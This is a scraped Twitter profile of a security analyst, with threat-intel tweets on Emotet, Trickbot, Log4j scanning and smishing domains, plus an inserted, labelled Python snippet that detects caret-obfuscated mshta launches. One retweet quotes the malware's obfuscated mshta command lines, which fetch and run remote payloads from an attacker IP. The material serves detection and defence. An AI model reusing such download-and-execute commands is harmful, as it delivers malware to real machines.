Yury Polozov (@cyberyp) 's Twitter Profile
Yury Polozov

@cyberyp

Cybersecurity, IT, threat assessments. Sr. Cyber Security Analyst. Tweets are my own (personal) opinions, not endorsed.

ID: 1162793783127367682

Joined: 17-08-2019 18:31:49

191 Tweets

48 Followers

63 Following

Max_Malyutin (@max_mal_)

#Emotet and #Trickbot once again similarity 🚨

#DFIR #BlueTeam command-line bypass ❗️

#LOLBin Mshta
lolbas-project.github.io/lolbas/Binarie…

EMOTET
Excel > cmd /c m^sh^t^a h^tt^p^:/^/87.251.85[.]100/PP/pp[.]html

TRICKBOT
Excel > cmd /c m^sh^t^a h^tt^p^:/^/87.251.85[.]100/love/love3[.]html
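As an added defender-side illustration (not code from the tweet or its author), the following Python check undoes the cmd.exe caret escaping seen in the two command lines above and flags mshta being handed a remote URL; the process-record field names and the benign third record are assumptions.

```python
import re

# Constructed sample process-creation records (field names are assumptions, not any EDR
# schema). The first two command lines are the ones quoted above, defanged with "[.]".
SAMPLE_RECORDS = [
    {"parent": "EXCEL.EXE", "cmdline": "cmd /c m^sh^t^a h^tt^p^:/^/87.251.85[.]100/PP/pp[.]html"},
    {"parent": "EXCEL.EXE", "cmdline": "cmd /c m^sh^t^a h^tt^p^:/^/87.251.85[.]100/love/love3[.]html"},
    {"parent": "explorer.exe", "cmdline": "cmd /c echo hello ^& dir"},  # benign caret use
]
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
MSHTA_RE = re.compile(r"(?<![\w\\])mshta(\.exe)?\b", re.IGNORECASE)

def decode_carets(cmdline: str) -> str:
    """Undo cmd.exe escaping: '^' makes the next character literal, so
    'm^sh^t^a' reads back as 'mshta'. A trailing lone '^' is dropped."""
    out, i = [], 0
    while i < len(cmdline):
        if cmdline[i] == "^":
            if i + 1 < len(cmdline):
                out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)

def refang(text: str) -> str:
    """Turn the page's defanged '[.]' back into '.' so the URL regex can match."""
    return text.replace("[.]", ".")

def analyse(parent: str, cmdline: str) -> dict:
    """Classify one record: caret obfuscation, mshta, remote URL, Office parent."""
    decoded = refang(decode_carets(cmdline))
    url = URL_RE.search(decoded)
    result = {
        "decoded": decoded,
        "caret_obfuscated": "^" in cmdline,
        "mshta": MSHTA_RE.search(decoded) is not None,
        "remote_url": url.group(0) if url else None,
        "office_parent": parent.lower() in OFFICE_PARENTS,
    }
    # Alert when mshta is handed a remote HTA; the other fields add context for triage.
    result["alert"] = result["mshta"] and result["remote_url"] is not None
    return result

def scan(records: list) -> list:
    """Run analyse() over a list of records (e.g. SAMPLE_RECORDS)."""
    return [analyse(r["parent"], r["cmdline"]) for r in records]
```

Matching on the decoded string rather than the raw one is the point: a rule that looks for the literal token "mshta" never sees it in the original command line.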
GreyNoise (@greynoiseio)

GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. 

greynoise.io/viz/query/?gnq…
Anomali (@anomali)

The latest detail on the Apache Log4j 2 incident from Anomali Threat Research Intel Analysts, including guidance on intel-driven alerting, detection and response. #log4j #log4shell #cybersecurity #infosec #java #Apache #CVE202144228 #vuln #threatintel
hubs.ly/Q010NGzL0
Anomali (@anomali)

The latest from Anomali Cyber Watch: Equation Group’s Post-Exploitation Framework, Decentralized Finance (DeFi) Protocol Exploited, Third #Log4j Vulnerability, and More. #Equation #Cybersecurity #Cybercrime #threatintelligence #Exploit hubs.ly/Q011jvVk0

Yury Polozov (@cyberyp)

New #smishing scam targeting #NewHampshire cell owners, judging by the code, a similar template was used against New York. Don't fall for it, not an official website, phishing for your social security and other information. #covidscam 
#IoCs: doh-dmv[.]com, registered to a gmail
Raphael Satter (@razhael)

But what proved key in the end was the Bitly short link Оксана Тінько uploaded along with the malicious accoounts-google URL. It tied back to a hyperactive bitly user who was creating tons of shortlinks — all of them pointing to similar phishing sites.

Bill Demirkapi (@billdemirkapi)

Interesting note. The "chrisro[.]fun" domain is registered to "SYKES LATIN AMERICA" and in this screenshot below we can see some tool in the taskbar named "SYKES Secur...".

Yury Polozov (@cyberyp)

Strange #smishing spam message: when opened in sandboxes this nyxk2[.]xyz...(no longer working) opened #Russian State TV domains 1tv[.]ru and 1tv[.]com

Cryptolaemus (@cryptolaemus1)

🚨#Emotet Update🚨 - Looks like Ivan laid an egg for easter and has been busy. As of about 14:00UTC today 2022/04/18 - Emotet on Epoch 4 has switched over to using 64-bit loaders and stealer modules. Previously everything was 32-bit except for occasional loader shenanigans. 1/x

Anomali (@anomali)

It's time to tap the large reservoir of talent with analytical skills to help tackle the #cybersecurity talent shortage. ow.ly/hgvy50JQN0l by Anomali's Gage via Dark Reading #talentshortage

Yury Polozov (@cyberyp)

At least one malicious Facebook profile similar to the NodeStealer 2.1 #malvertising campaign reported by Bitdefender is still online. #CyberSecurity
